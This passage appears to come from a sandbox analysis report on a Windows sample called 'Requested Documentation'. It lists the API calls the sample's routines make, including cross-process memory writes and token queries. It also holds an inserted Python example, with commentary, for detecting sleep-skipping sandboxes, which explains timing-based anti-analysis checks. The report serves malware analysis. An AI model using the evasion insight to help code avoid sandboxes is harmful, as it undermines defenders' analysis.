                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ForegroundPixelRelease
                                                                              • String ID:
                                                                              • API String ID: 4156661090-0
                                                                              • Opcode ID: e8322f9027e2f3506134f91eaf24a374f248e501971dda1151118aa96f31d1a2
                                                                              • Instruction ID: a2f3effb28ca16cc6f1a38a921c17ffb48ea79bce7ecbf2a8e92d6a53cfa1cf8
                                                                              • Opcode Fuzzy Hash: e8322f9027e2f3506134f91eaf24a374f248e501971dda1151118aa96f31d1a2
                                                                              • Instruction Fuzzy Hash: 02218435A00508AFD714EFA5DC84A6AB7E5EF88311F148579F90997752CA71ED01CB90
                                                                              APIs
                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0098134D
                                                                              • SelectObject.GDI32(?,00000000), ref: 0098135C
                                                                              • BeginPath.GDI32(?), ref: 00981373
                                                                              • SelectObject.GDI32(?,00000000), ref: 0098139C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                              • String ID:
                                                                              • API String ID: 3225163088-0
                                                                              • Opcode ID: 2eb482f20ed89aac907613fccf986ba23e031e25d64f7d9a87321acef6dbc90a
                                                                              • Instruction ID: 9492b4bf98e87e9d207ba4156e81688f9d7a1756688b074d339b3aee3bcf9a35
                                                                              • Opcode Fuzzy Hash: 2eb482f20ed89aac907613fccf986ba23e031e25d64f7d9a87321acef6dbc90a
                                                                              • Instruction Fuzzy Hash: B5213038C00608EFDB11EFA5ED44B697BACFB51321F144216F814A66B1DB729993EF90
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memcmp
                                                                              • String ID:
                                                                              • API String ID: 2931989736-0
                                                                              • Opcode ID: 7fe28f017ed25110522c4ad771fce155eba64ba3f9ca41131ade6d674e8ea724
                                                                              • Instruction ID: f37abe18845dcfb1057779bfd433b57297ac6738f8d223be42b2be37ddb754cf
                                                                              • Opcode Fuzzy Hash: 7fe28f017ed25110522c4ad771fce155eba64ba3f9ca41131ade6d674e8ea724
                                                                              • Instruction Fuzzy Hash: 8E01B5B1684205BBD2046A399D42FFBB35CFF55388F058423FE0596342EB60DE2083E4
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 009E4ABA
                                                                              • __beginthreadex.LIBCMT ref: 009E4AD8
                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 009E4AED
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009E4B03
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009E4B0A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                              • String ID:
                                                                              • API String ID: 3824534824-0
                                                                              • Opcode ID: c2037b5eab744ab8f1eca45a367922ac430ab9cd595f23909d9dabcca4a05e11
                                                                              • Instruction ID: 7c0bc79dc18d36db72f1461a3b0bed7032e2a165c2e0ff713b8e1c73b3b3b7b9
                                                                              • Opcode Fuzzy Hash: c2037b5eab744ab8f1eca45a367922ac430ab9cd595f23909d9dabcca4a05e11
                                                                              • Instruction Fuzzy Hash: A011E57AD04248BFC711DFF9AC08ADE7BACAB85321F144266F914D3251D6B18D0687A0
                                                                              APIs
                                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009D821E
                                                                              • GetLastError.KERNEL32(?,009D7CE2,?,?,?), ref: 009D8228
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,009D7CE2,?,?,?), ref: 009D8237
                                                                              • HeapAlloc.KERNEL32(00000000,?,009D7CE2,?,?,?), ref: 009D823E
                                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009D8255
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 842720411-0
                                                                              • Opcode ID: 387c407d43aac1afe2ea9a6921995d018f8a9cbe2cacd0f70f85ff012f65ef8c
                                                                              • Instruction ID: 9eac807741d5914e675dd9100a72d6ee8931a673c1c92dbfee6d179ff8801c5f
                                                                              • Opcode Fuzzy Hash: 387c407d43aac1afe2ea9a6921995d018f8a9cbe2cacd0f70f85ff012f65ef8c
                                                                              • Instruction Fuzzy Hash: B80186B1240208FFDB208FA5DC89D677F7CEF89794B504569F919D3220DB319C02CA60
                                                                              APIs
                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?,?,009D7455), ref: 009D7127
                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?), ref: 009D7142
                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?), ref: 009D7150
                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?), ref: 009D7160
                                                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?), ref: 009D716C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 3897988419-0
                                                                              • Opcode ID: 5d8d43c1f2ec00aeacef84b76ffffba71c3b7df58c0f5f5bcda2f512eb8fcc65
                                                                              • Instruction ID: 5495435268a0bd6cbd9e859ccedf7ff8466dc5fd3e9c311dd873ebb2e6922016
                                                                              • Opcode Fuzzy Hash: 5d8d43c1f2ec00aeacef84b76ffffba71c3b7df58c0f5f5bcda2f512eb8fcc65
                                                                              • Instruction Fuzzy Hash: 48018476605218BFDB218FA4DC44BAABBBDEF44791F148165FD04E2310E731DD4297A0
                                                                              APIs
                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E5260
                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 009E526E
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E5276
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 009E5280
                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E52BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                              • String ID:
                                                                              • API String ID: 2833360925-0
                                                                              • Opcode ID: 71b8e97021fb4fdbc2f7cb54cb858cb67941cee716a99ba9f4cc186dd920a3cc
                                                                              • Instruction ID: 25d00fd2f90f01970815ea24645a6966bbee3f43147f9e676d4e4ddb652f6dd4
                                                                              • Opcode Fuzzy Hash: 71b8e97021fb4fdbc2f7cb54cb858cb67941cee716a99ba9f4cc186dd920a3cc
                                                                              • Instruction Fuzzy Hash: 37016931D01A1DDBCF10EFE5E888AEDBB78FB0C315F420566EA55B2240CB3099528BA1
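The routine listed above reads QueryPerformanceCounter (and its frequency) on either side of Sleep. The listing does not say what the measurement is used for, and in an AutoIt runtime a loop of this shape is also how a precise sleep is implemented, so it is not evidence of evasion on its own. The same bracketing is, however, exactly what an analyst runs against their own sandbox to see whether sleeps are being shortened, and what a sample does when it checks. The block below is an added example, not code from the sample or the report: Python's `time.perf_counter` stands in for QueryPerformanceCounter, and `skipping_sleep` and `JumpingClock` are constructed stand-ins for a sleep-skipping sandbox and a patched timer.

```python
"""Probe for sleep acceleration by reading a high-resolution clock on both sides
of a sleep, as the routine above brackets Sleep with QueryPerformanceCounter.
Added example for an analyst's own sandbox check; not code from the sample."""
import time


def measure_sleep(requested_s, sleep_fn=time.sleep, clock=time.perf_counter):
    """Return (elapsed_s, accelerated).  A genuine sleep may overrun but cannot
    return materially early, so less than half the requested interval on the
    clock means the sleep was cut short or the clock was patched to hide it."""
    t0 = clock()
    sleep_fn(requested_s)
    elapsed = clock() - t0
    return elapsed, elapsed < requested_s / 2


def cross_check_clocks(requested_s, sleep_fn=time.sleep,
                       clocks=(time.perf_counter, time.time)):
    """Time the same sleep with two independent clocks.  A sandbox that patches
    only the clock the probe is known to read leaves the other one honest, so
    a disagreement between them is itself a signal.  Returns (a, b, disagree);
    the tolerance is generous (half the request, at least 20 ms) to absorb the
    coarse resolution of wall-clock timers."""
    a0, b0 = clocks[0](), clocks[1]()
    sleep_fn(requested_s)
    a, b = clocks[0]() - a0, clocks[1]() - b0
    return a, b, abs(a - b) > max(requested_s / 2, 0.02)


# Constructed stand-ins for what a sleep-skipping sandbox does, used for testing.
def skipping_sleep(_seconds):
    """Returns at once instead of waiting."""


class JumpingClock:
    """Fast-forwards by `step` on every read, hiding a skipped sleep from a
    single-clock probe."""
    def __init__(self, step=1.0):
        self.now, self.step = 0.0, step

    def __call__(self):
        self.now += self.step
        return self.now
```

The single-clock probe is defeated by a sandbox that also fast-forwards the clock it reads; that is why `cross_check_clocks` times the same sleep on two sources and treats their disagreement as the signal, which is the analogue of a sample comparing QueryPerformanceCounter against GetTickCount or the system time.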
                                                                              APIs
                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009D8121
                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009D812B
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D813A
                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8141
                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8157
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 44706859-0
                                                                              • Opcode ID: 0753f1c14b1366bd7b5920726a93f66437c69b5bb7e743ac3e4655c05230e99d
                                                                              • Instruction ID: 611b6cfafa28bae27eff5cf7232e5b365c51448c45f1c131cb0523f9d8aeb479
                                                                              • Opcode Fuzzy Hash: 0753f1c14b1366bd7b5920726a93f66437c69b5bb7e743ac3e4655c05230e99d
                                                                              • Instruction Fuzzy Hash: C5F0C2B0244318AFEB214FA4EC89F673BACFF49794B004036FA45D6250DB609C07DA60
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 009DC1F7
                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 009DC20E
                                                                              • MessageBeep.USER32(00000000), ref: 009DC226
                                                                              • KillTimer.USER32(?,0000040A), ref: 009DC242
                                                                              • EndDialog.USER32(?,00000001), ref: 009DC25C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 3741023627-0
                                                                              • Opcode ID: 99212f65c00d4d765a203bef66b78e024d4aa43682272834812af35d40d461a3
                                                                              • Instruction ID: 1807dc007294563149f7f0cb06a8819d59a014b062e20667924245f914bbc1a0
                                                                              • Opcode Fuzzy Hash: 99212f65c00d4d765a203bef66b78e024d4aa43682272834812af35d40d461a3
                                                                              • Instruction Fuzzy Hash: 6D01DB70444309ABEB319B90DD4EF96777CFF00705F04466AF652A15E0D7F5A945CB50
                                                                              APIs
                                                                              • EndPath.GDI32(?), ref: 009813BF
                                                                              • StrokeAndFillPath.GDI32(?,?,009BB888,00000000,?), ref: 009813DB
                                                                              • SelectObject.GDI32(?,00000000), ref: 009813EE
                                                                              • DeleteObject.GDI32 ref: 00981401
                                                                              • StrokePath.GDI32(?), ref: 0098141C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                              • String ID:
                                                                              • API String ID: 2625713937-0
                                                                              • Opcode ID: 663d321aac9e3d0a1c841f5529008f50b38bf4772d9ff48fafb6f78b3f777d59
                                                                              • Instruction ID: 4cbcdbf76a1eb99f85dbe1a798a929288eb2767a21eb3baa78b5d1ef504162cd
                                                                              • Opcode Fuzzy Hash: 663d321aac9e3d0a1c841f5529008f50b38bf4772d9ff48fafb6f78b3f777d59
                                                                              • Instruction Fuzzy Hash: A5F0CD3840460CDFDB25DFB6EC4C7583BA8AB42326F088225E429595F2DB368597EF50
                                                                              APIs
                                                                                • Part of subcall function 009A0DB6: std::exception::exception.LIBCMT ref: 009A0DEC
                                                                                • Part of subcall function 009A0DB6: __CxxThrowException@8.LIBCMT ref: 009A0E01
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 00987A51: _memmove.LIBCMT ref: 00987AAB
                                                                              • __swprintf.LIBCMT ref: 00992ECD
                                                                              Strings
                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00992D66
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                              • API String ID: 1943609520-557222456
                                                                              • Opcode ID: 5c2f1ce7347328efa7a07cd8c30106f61c39fd9f4457bcef9faff3e907cb620d
                                                                              • Instruction ID: acd8e1e9c042f1afe59d9b6f0ae9636934b1441f109d98d907a71a07edd6a179
                                                                              • Opcode Fuzzy Hash: 5c2f1ce7347328efa7a07cd8c30106f61c39fd9f4457bcef9faff3e907cb620d
                                                                              • Instruction Fuzzy Hash: F5913971508301AFCB14FF68C885E6FB7A8EFD6710F14491DF4969B2A1EA21ED44CB92
                                                                              APIs
                                                                                • Part of subcall function 00984750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00984743,?,?,009837AE,?), ref: 00984770
                                                                              • CoInitialize.OLE32(00000000), ref: 009EB9BB
                                                                              • CoCreateInstance.OLE32(00A12D6C,00000000,00000001,00A12BDC,?), ref: 009EB9D4
                                                                              • CoUninitialize.OLE32 ref: 009EB9F1
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                              • String ID: .lnk
                                                                              • API String ID: 2126378814-24824748
                                                                              • Opcode ID: d8fb700983b65a4f7f4ac98e1a6249741264930e35c2682309c7529e4260c9bf
                                                                              • Instruction ID: 9f47691cf3cfcf543fd8b9f044d5b0ca90e72dc1ae26eb5a10e9fd2aa46f0c92
                                                                              • Opcode Fuzzy Hash: d8fb700983b65a4f7f4ac98e1a6249741264930e35c2682309c7529e4260c9bf
                                                                              • Instruction Fuzzy Hash: 1FA169756043459FCB10EF15C884E6ABBE5FF89314F188998F8999B3A1CB31EC46CB91
                                                                              APIs
                                                                              • __startOneArgErrorHandling.LIBCMT ref: 009A50AD
                                                                                • Part of subcall function 009B00F0: __87except.LIBCMT ref: 009B012B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorHandling__87except__start
                                                                              • String ID: pow
                                                                              • API String ID: 2905807303-2276729525
                                                                              • Opcode ID: 15d03cba356f70973839ec0ac31e236d8da54ef63276db93fe4d62afdd541211
                                                                              • Instruction ID: fc31be608aab56beaae448dddb0bbd44dd44286ca0d828d886e3b485448c6211
                                                                              • Opcode Fuzzy Hash: 15d03cba356f70973839ec0ac31e236d8da54ef63276db93fe4d62afdd541211
                                                                              • Instruction Fuzzy Hash: A3515E61B0C60196DB15B718CA053FF3B98DFC2720F218D59E4D9862A9EE38CDC997C6
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$_memmove
                                                                              • String ID: ERCP
                                                                              • API String ID: 2532777613-1384759551
                                                                              • Opcode ID: 871618a6e41eb48fc46eabd6b3d93c9e63d3d2c548333d8f07006e4152bb8d7a
                                                                              • Instruction ID: 4f498367e1884c6d3223724fce17d53bf8faef71091a03f552c9ce653843de7f
                                                                              • Opcode Fuzzy Hash: 871618a6e41eb48fc46eabd6b3d93c9e63d3d2c548333d8f07006e4152bb8d7a
                                                                              • Instruction Fuzzy Hash: DB518171900705DBDF24CF69C9427AAB7E9EF44314F20896EE45ADB291E774AA44CB80
                                                                              APIs
                                                                                • Part of subcall function 009E14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009D9296,?,?,00000034,00000800,?,00000034), ref: 009E14E6
                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009D983F
                                                                                • Part of subcall function 009E1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009D92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 009E14B1
                                                                                • Part of subcall function 009E13DE: GetWindowThreadProcessId.USER32(?,?), ref: 009E1409
                                                                                • Part of subcall function 009E13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,009D925A,00000034,?,?,00001004,00000000,00000000), ref: 009E1419
                                                                                • Part of subcall function 009E13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,009D925A,00000034,?,?,00001004,00000000,00000000), ref: 009E142F
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009D98AC
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009D98F9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                              • String ID: @
                                                                              • API String ID: 4150878124-2766056989
                                                                              • Opcode ID: c617873a72bd8a01de15469c13911b86f59343ab6e24c05bfc408db01b8229ec
                                                                              • Instruction ID: 1acf338b67b55c643bed17a60b02842c1b549cd43d60d5384c662efda5be55d1
